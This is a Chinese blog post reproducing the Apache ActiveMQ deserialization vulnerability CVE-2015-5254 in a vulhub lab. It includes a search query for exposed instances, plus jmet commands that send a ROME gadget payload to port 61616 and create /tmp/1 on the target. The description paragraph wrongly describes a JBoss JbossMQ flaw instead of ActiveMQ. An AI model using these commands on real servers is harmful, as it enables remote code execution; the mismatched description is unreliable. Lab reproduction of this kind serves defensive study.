当前位置: 首页 > news >正文

【漏洞复现】ActiveMQ反序列化漏洞(CVE-2015-5254)

Nx01 产品简介

        Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。

Nx02 漏洞描述

        Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

Nx03 产品主页

hunter-query: web.title="Apache ActiveMQ"

Nx04 漏洞复现

1.vulhub启动靶场。

2.kali中执行以下命令。

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/1" -Yp ROME 192.168.239.129 61616

3.此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过下面的URL看到这个队列中所有消息http://192.168.13.132:8161/admin/browse.jsp?JMSDestination=event

4.点击此条队列详细进行触发。

5.查看容器sudo docker-compose exec activemq bash,/tmp/1已成功创建成功。

Nx05 修复建议

Apache升级activemq5.13.0。

http://www.lryc.cn/news/277129.html

相关文章:

  • 面试题:MySQL误删表数据,如何快速恢复丢失的数据?
  • 李沐之神经网络基础
  • 【docker】使用 Dockerfile 构建镜像
  • 计算机网络—— 概述
  • “超人练习法”系列06:如何更好地掌握技能?
  • 【华为OD机试真题2023CD卷 JAVAJS】字符串拼接
  • 【算法】链表-20240109
  • 机器学习系列--R语言随机森林进行生存分析(2)
  • Flutter GetX 之 状态管理
  • e2studio开发磁力计LIS2MDL(1)----轮询获取磁力计数据
  • C++ 字符串大小写转换,替换,文件保存 方法封装
  • 计算机基础面试题 |19.精选计算机基础面试题
  • mysql 添加用户并分配select权限
  • 重新认识canvas,掌握必要的联结密码
  • Linux第21步_取消鼠标中键的复制粘贴功能
  • 数学建模-Matlab R2022a安装步骤
  • 【AI】Pytorch 系列:学习率设置
  • LeetCode第107题 - 二叉树的层序遍历 II
  • java 常⽤的线程池模式FixedThreadPool
  • 双机调度算法
  • 精进单元测试技能——Pytest断言的艺术
  • 探索人工智能:深度学习、人工智能安全和人工智能
  • CHS_02.1.4+操作系统体系结构 二
  • 【python可视化大屏】使用python实现可拖拽数据可视化大屏
  • FineBI实战项目一(4):指标分析之每日订单总额/总笔数
  • 如何确定CUDA对应的pytorch版本?
  • 分布式锁3: zk实现分布式锁5 使用中间件curator
  • 扩展边界opencv
  • 开源C语言库Melon:Cron格式解析
  • vue的学习方法